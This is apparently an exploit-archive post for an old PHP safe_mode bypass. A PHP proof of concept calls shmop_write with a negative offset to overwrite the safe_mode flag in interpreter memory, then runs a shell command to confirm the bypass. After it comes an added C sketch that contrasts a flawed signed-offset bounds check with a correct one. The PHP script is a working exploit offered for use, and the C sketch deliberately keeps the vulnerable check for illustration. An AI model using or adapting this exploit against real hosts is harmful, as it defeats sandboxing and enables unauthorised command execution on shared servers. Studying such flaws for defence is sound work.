
PHP Shmop Write of Arbitrary Memory Exploit

Author: shm bytes
Code:
<?
/*
Php Safe_mode Bypass Proof of concept.

Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

Disclaimer: The author is not responsible of any damage this script can cause
-SECU
*/

$shm_id = shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) {
    echo "Couldn't create shared memory segment\n";
    die;
}

// $data="\x01";
// the new value for safe_mode
$data="\x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
$offset=-3842685;
// Let's write the new value at our offset.
$shm_bytes_written = shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) {
    echo "Couldn't write the entire length of data\n";
}

// Now let's delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
    echo "Couldn't mark shared memory block for deletion.";
}
shmop_close($shm_id);

// Let's try if safe mode has been set to off
echo passthru("id");
dl("shmop.so");
?>
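The PoC above depends on shmop_write() accepting a negative offset. The following C sketch is an added example, not part of the original post and not PHP's source: it models a write routine that tests only the upper bound of a signed offset beside one that also rejects negative offsets. The arena layout, the guard bytes and all function names are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SEG_SIZE 100  /* same size the PoC passes to shmop_open() */
#define GUARD    16   /* constructed: unrelated state placed before the segment */

/* Constructed arena: the segment starts GUARD bytes in, so a small negative
   offset stays inside the array and the stray write is observable safely. */
struct arena { unsigned char mem[GUARD + SEG_SIZE]; };

static unsigned char *seg_base(struct arena *a) { return a->mem + GUARD; }

/* Weak check (assumed model): only the upper bound of a signed offset is tested. */
long write_weak(struct arena *a, const void *data, long len, long offset)
{
    if (offset > SEG_SIZE) return -1;           /* negative offsets pass this test */
    if (offset < -GUARD || len < 0) return -1;  /* model limit: stay inside the arena */
    long room = SEG_SIZE - offset;
    long n = len < room ? len : room;
    memcpy(seg_base(a) + offset, data, (size_t)n);
    return n;
}

/* Bounded check: reject negative offsets and lengths, clamp to the segment end. */
long write_checked(struct arena *a, const void *data, long len, long offset)
{
    if (len < 0 || offset < 0 || offset > SEG_SIZE) return -1;
    long room = SEG_SIZE - offset;
    long n = len < room ? len : room;
    memcpy(seg_base(a) + offset, data, (size_t)n);
    return n;
}

/* Returns the byte just before the segment after a 1-byte write of 0x00 at offset -1. */
int guard_after(long (*wr)(struct arena *, const void *, long, long))
{
    struct arena a;
    memset(a.mem, 0x01, sizeof a.mem);  /* guard byte starts as 1 ("on") */
    wr(&a, "\x00", 1, -1);
    return a.mem[GUARD - 1];
}

int main(void)
{
    printf("weak check:    guard=%d\n", guard_after(write_weak));
    printf("bounded check: guard=%d\n", guard_after(write_checked));
    return 0;
}
```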
